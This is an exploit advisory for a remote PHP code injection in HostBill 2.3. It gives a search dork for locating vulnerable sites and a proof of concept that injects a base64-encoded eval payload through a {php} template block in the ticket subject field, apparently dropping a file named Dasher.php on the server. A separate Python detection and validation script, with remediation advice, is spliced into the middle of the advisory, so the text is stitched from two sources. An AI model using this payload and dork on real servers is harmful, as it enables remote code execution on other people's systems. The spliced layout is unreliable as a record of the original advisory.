HostBill App 2.3 - Remote Code Injection

EDB-ID: 18428

CVE:

Platform: PHP

Date: 2012-01-30


=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah, The Most Beneficent, The Most Merciful}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Type: remote PHP code injection
[~] Vendor: hostbillapp.com
[+] Software: HostBill
[+] Version: v2.3
[~] 
[+] Author: Dr.DaShE
[~] Team: Team 403
[?] 
[-] Contact: Dasher403[at]gmail.com
[?] Date: 2g.J4N.2oll 
[?] 
[?] T!ME: 04:46 AM ara-blackhat
[^] 
[?]
=============================================================================== 
# HostBill script vulnerable to remote PHP code injection
=============================================================================== 


[!] Exploit already tested on an Apache/Linux server

Dork: Powered by HostBill

[^] Error console:-

http://localhost/billing/index.php?/tickets/new/
 
[?] PoC exploit:
 
http://localhost/billing/index.php?/tickets/new/

The PHP payload goes into the ticket subject field, base64-encoded and wrapped in a template `{php}` block,
for example:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq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'));{/php}

http://localhost/Dasher.php
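The advisory shows the subject field being rendered as template source, so a `{php}...{/php}` block (Smarty's PHP block tag, an assumption about the engine based on the syntax shown) runs server-side. The following added Python example, not part of the original advisory, scans ticket subjects for that pattern, decodes any base64 argument for analyst review without executing it, and rejects subjects that contain template tags at all; the sample subjects are constructed.

```python
import base64
import re

# Constructed sample ticket subjects (not taken from the advisory):
# benign, an eval(base64_decode()) inside a {php} block, and a plain {php} block.
SAMPLE_SUBJECTS = [
    "Invoice #1042 not marked as paid",
    "{php}eval(base64_decode('ZWNobyAnaGVsbG8nOw=='));{/php}",
    "{php}echo 1;{/php} help",
]

# {php}...{/php} is the Smarty PHP block tag shown in the advisory.
PHP_BLOCK = re.compile(r"\{php\}(.*?)\{/php\}", re.IGNORECASE | re.DOTALL)
# eval(base64_decode('<b64>')) with the base64 argument captured.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.IGNORECASE
)
# Opening of any Smarty-style tag: "{" followed by an optional "/" and a letter or "$".
TEMPLATE_TAG = re.compile(r"\{\s*/?\s*[A-Za-z$]")


def decode_preview(b64, limit=60):
    """Decode a base64 argument for review; returns None if it is not valid base64.
    The decoded text is never executed, only returned for the analyst."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", errors="replace")[:limit]


def scan_subject(subject):
    """Describe template-injection indicators found in one ticket subject."""
    blocks = PHP_BLOCK.findall(subject)
    finding = {"php_tag": bool(blocks), "eval_b64": False, "preview": None}
    for body in blocks:
        match = EVAL_B64.search(body)
        if match:
            finding["eval_b64"] = True
            finding["preview"] = decode_preview(match.group(1))
    return finding


def subject_is_safe(subject):
    """Conservative input check: refuse anything that looks like a template tag."""
    return TEMPLATE_TAG.search(subject) is None


if __name__ == "__main__":
    for subject in SAMPLE_SUBJECTS:
        print(subject_is_safe(subject), scan_subject(subject))
```

Detection alone is a stopgap: the underlying fix is to never compile user-supplied strings as template source (assign them as template variables instead) and to disable the engine's PHP tag handling.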



 
 
[~]-----------------------------{(Team 403)}------------------------------------------------
# 
[~] Greetz tO:Nex & WeeD & R3d D3v!L & HITLR & Red virus & Dr.Dmar & MaFiA & Mr.NsaaNy & ...etc ;
# 
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ; 
# 
[?] special SupPoRT : ABH-Sec.Com & packet storm & 1337day & Maksymilian Arciemowicz # ;
# 
[~]spechial FR!ND: they all are spechials ;) #; 
# 
[~] !'M 4R48!4N 3XPL0!73R. #; 
# 
[~](>D!R 4ll 0R D!E<) #; 
# 
[~]---------------------------------------------------------------------------------------------